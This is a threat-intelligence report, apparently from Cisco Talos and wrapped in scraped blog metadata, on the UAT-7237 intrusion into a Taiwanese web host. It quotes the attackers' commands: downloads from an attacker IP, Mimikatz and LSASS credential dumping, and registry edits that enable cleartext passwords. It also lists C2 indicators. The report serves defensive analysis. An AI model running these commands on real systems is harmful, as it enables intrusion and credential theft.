{“lastseen”:”2025-08-15T12:04:20″,”description”:”* Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.\\n * UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.\\n * UAT-7237 aims to establish long-term persistence in high-value victim environments.\\n * Talos also identified a customized Shellcode loader in UAT-7237’s arsenal that we track as \\”SoundBill.\\” SoundBill can be used to decode and load any shellcode, including Cobalt Strike.\\n\\n\\n\\n* * *\\n\\n\\n\\nTalos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237’s tooling consists of open-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as \\”SoundBill.\\”\\n\\nTalos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237’s tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using the Chinese language as their preliminary language of choice. \\n\\nWhile Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237’s tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:\\n\\n * UAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies primarily on Meterpreter based reverse shells.\\n * After a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237’s deployment of web shells is highly selective and only on a chosen few compromised endpoints.\\n * While UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.\\n\\n\\n\\nIn a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.\\n\\n## Initial access and reconnaissance\\n\\nUAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.\\n\\nReconnaissance consists of identifying remote hosts, both internal and on the internet:\\n \\n \\n cmd \/c nslookup \\u003cvictim’s_domain\\u003e\\n cmd \/c systeminfo\\n cmd \/c curl\\n cmd \/c ping 8[.]8[.]8[.]8 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\\n cmd \/c ping 141[.]164[.]50[.]141\u00a0 \u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\/\/ Attacker controlled remote server.\\n cmd \/c ping \\u003cvictim’s_domain\\u003e\\n cmd \/c ipconfig \/all\\n \\n\\nWhile UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later access the systems via RDP:\\n \\n \\n cmd \/c c:\\\\temp\\\\WM7Lite\\\\download[.]exe\u00a0 hxxp[:\/\/]141[.]164[.]50[.]141\/sdksdk608\/win-x64[.]rar c:\\\\temp\\\\WM7Lite\\\\1[.]rar\\n \\n powershell (new-object System[.]Net[.]WebClient).DownloadFile(‘hxxp[:\/\/]141[.]164[.]50[.]141\/sdksdk608\/vpn[.]rar’,’C:\\\\Windows\\\\Temp\\\\vmware-SYSTEM\\\\vmtools[.]rar’)\\n \\n\\nOnce UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:\\n \\n \\n cmd[.]exe \/c cd \/d \\”\\u003cremote_smb_share\\u003e\\”\\u0026net use\\n cmd[.]exe \/c cd \/d \\”\\u003cremote_smb_share\\u003e\\”\\u0026dir \\\\\\\\\\u003cremote_smb_share\\u003e\\\\c$\\\\\\n cmd[.]exe \/c cd \/d \\”C:\\\\\\”\\u0026net group \\”domain admins\\” \/domain\\n cmd[.]exe \/c cd \/d \\”C:\\\\\\”\\u0026net group \\”domain controllers\\” \/domain\\n \\n\\nIn addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI and WMICmd:\\n \\n \\n cmd[.]exe \/c cd \/d \\”C:\\\\\\”\\u0026C:\\\\ProgramData\\\\dynatrace\\\\sharpwmi[.]exe \\u003cIP\\u003e \\u003cuser\\u003e \\u003cpass\\u003e cmd whoami\\n \\n cmd.exe \/c cd \/d \\”C:\\\\DotNet\\\\\\”\\u0026WMIcmd.exe\\n \\n wmic \/node:\\u003cIP\\u003e \/user:Administrator \/password:\\u003cpass\\u003e process call create cmd.exe \/c whoami\\n \\n wmic \/node:\\u003cIP\\u003e \/user:Administrator \/password:\\u003cpass\\u003e process call create cmd.exe \/c netstat -ano \\u003ec:\\\\1.txt\\n \\n \\n\\nSharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code executions.\\n\\nUAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:\\n \\n \\n cmd.exe \/c systeminfo\\n cmd.exe \/c tasklist\\n cmd.exe \/c net1 user \/domain\\n cmd.exe \/c whoami \/priv\\n cmd.exe \/c quser\\n \\n\\n## Post-compromise tooling and actions on objectives\\n\\n### SoundBill\\n\\nAfter compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237’s custom-built tools as \\”SoundBill.\\” SoundBill is built based on \\”VTHello\\” and is a shellcode loader written in Chinese that will decode a file on disk named \\”ptiti.txt\\” and execute the resulting shellcode.\\n\\nIt is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.\\n\\nSoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of Mimikatz:\\n \\n \\n VTSB.exe privilege::debug sekurlsa::logonpasswords exit\\n \\n\\nOr it may be a mechanism to execute arbitrary commands on the infected system, such as:\\n \\n \\n c:\\\\temp\\\\vtsb.exe -c whoami\\n \\n\\nThe shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long term access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with SoundBill communicate over HTTPS with its command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws\\n\\n### JuicyPotato\\n\\nUAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints such as:\\n \\n \\n cmd.exe \/c c:\\\\hotfix\\\\juicy2.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami\\n \\n\\n## Configuration changes\\n\\nDuring intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:\\n \\n \\n reg add HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\system \/v LocalAccountTokenFilterPolicy \/t REG_DWORD \/d 1 \/f\\n \\n\\nThey also attempted to enable storage of cleartext passwords:\\n \\n \\n reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 \/f\\n \\n\\nUAT-7237 also accessed the Component Services management console, likely to adjust privileges for their malicious components:\\n \\n \\n mmc comexp.msc\\n \\n\\n## UAT-7237’s pursuit of credentials\\n\\nUAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by using a Mimikatz instance built into SoundBill to extract credentials:\\n\\n**Filename\/command** | **Tooling name** \\n—|— \\nabc.dll | Comsvcs.dll for LSASS process dumping \\nFileless.exe | Mimikatz \\nVTSB.exe privilege::debug sekurlsa::logonpasswords exit | SoundBill with the Mimikatz payload \\n \\nFurthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the registry and disk:\\n \\n \\n reg query \\”HKCU\\\\Software\\\\ORL\\\\WinVNC3\\\\Password\\”\\n dir c:\\\\*vnc.ini \/s \/b\\n \\n\\nAnother (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable — again for credential extraction:\\n \\n \\n cmd.exe \/c C:\\\\hotfix\\\\invoketest.exe\u00a0 -cmd \\”cmd \/c\u00a0 C:\\\\hotfix\\\\1.bat\\”\\n cmd.exe \/c C:\\\\hotfix\\\\invoketest.exe\u00a0 -cmd \\”cmd \/c\u00a0\u00a0 C:\\\\hotfix\\\\Project1.exe\u00a0 C:\\\\hotfix\\\\SSP.dll\\”\\n \\n\\n\\”Project1[.]exe\\” above is the ssp_dump_lsass project on GitHub. It takes a DLL file as an argument, injects it into the Local Security Authority Service (LSASS) process, which then dumps the LSASS process into a BIN file.\\n\\nOptionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:\\n \\n \\n cmd.exe \/c c:\\\\hotfix\\\\juicy2.exe -t * -c\u00a0 {e60687f7-01a1-40aa-86ac-db1cbf673334} -p \\”c:\\\\windows\\\\system32\\\\cmd.exe\\”\u00a0 -a \\”\/c c:\\\\hotfix\\\\1.bat\\”\\n \\n\\nThe process dump obtained is then staged into an archive for exfiltration:\\n \\n \\n cmd.exe \/c \\”c:\\\\program files\\\\7-Zip\\\\7z.exe\\”\u00a0 a\u00a0 C:\\\\hotfix\\\\1.zip\u00a0 C:\\\\hotfix\\\\1.bin\\n \\n\\n## Proliferating through the enterprise\\n\\nUAT-7237 uses the following network scanning tooling:\\n\\n**FScan:** A network scanner tool used to scan for open ports against IP subnets:\\n \\n \\n fileless -h 10.30.111.1\/24 -nopoc -t 20\\n \\n\\n**SMB scans:** To identify SMB services information on specific endpoints:\\n \\n \\n smb_version 10.30.111.11 445\\n \\n\\nAs soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using credentials they’ve extracted previously:\\n \\n \\n cmd[.]exe \/c netstat -ano |findstr 3389\\n cmd[.]exe \/c nslookup \\u003cvictim’s_subdomains\\u003e\\n cmd[.]exe \/c net use\u00a0 \\u003cIP\\u003e\\\\ipc$ \\u003cpass\\u003e\u00a0 \/user:\\u003cuserid\\u003e\\n cmd[.]exe \/c dir\u00a0\u00a0 \\\\\\\\\\u003cremote_system\\u003e\\\\c$\\n cmd[.]exe \/c net use\u00a0 \\\\\\\\\\u003cremote_system\\u003e\\\\ipc$ \/del\\n \\n\\n## SoftEther VPN\\n\\nThe remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.\\n\\nTalos’ analysis of the SoftEther artifacts led to the following observations of UAT-7237’s TTPs:\\n\\n * The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.\\n * UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language configuration file, indicating that the operators were proficient with the language.\\n\\n\\n\\n## Coverage\\n\\nWays our customers can detect and block this threat are listed below.\\n\\n\\n\\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\\n\\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\\n\\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\\n\\nCisco Secure Network\/Cloud Analytics (Stealthwatch\/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.\\n\\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\\n\\nCisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.\\n\\nUmbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.\\n\\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.\\n\\nAdditional protections with context to your specific environment and threat data are available from the Firewall Management Center.\\n\\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\\n\\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.\\n\\nThe following Snort rules cover this threat:\\n\\n * Snort v2 : 64908 – 64916\\n * Snort v3: 301209 – 301212\\n\\n\\n\\n## IOCs\\n\\nIOCs for this research can also be found at our GitHub repository _here_.\\n \\n \\n 450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a – C:\\\\temp\\\\wmiscan.exe\\n 6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa – c:\/hotfix\/Project1.exe – ssp_dump_lsass tool\\n E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 – C:\/hotfixlog\/Fileless.exe – FScan\\n B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 – C:\/hotfixlog\/smb_version.exe\\n 864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe – Mimikatz\\n \u00a0\\n SoundBill\\n Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386\\n \u00a0\\n Cobalt Strike\\n 0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7\\n 7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f\\n \u00a0\\n cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1[.]on[.]aws\\n http[:\/\/]141[.]164[.]50[.]141\/sdksdk608\/win-x64[.]rar\\n 141[.]164[.]50[.]141″,”published”:”2025-08-15T10:00:56″,”modified”:”2025-08-15T10:00:56″,”type”:”talosblog”,”title”:”UAT-7237 targets Taiwanese web hosting infrastructure”,”source”:””,”references”:””,”id”:”TALOSBLOG:E652FB1494612EFDFC0E351DE134A45A”,”bulletinFamily”:”blog”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/blog.talosintelligence.com\/uat-7237-targets-web-hosting-infra\/”,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-15T12:04:20″,”description”:”* Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.\\n * UAT-7237…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,13,33,7,69,11,5],"class_list":["post-13141","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-security","tag-talosblog","tag-tapic","tag-vulnerability"],"yoast_head":"\n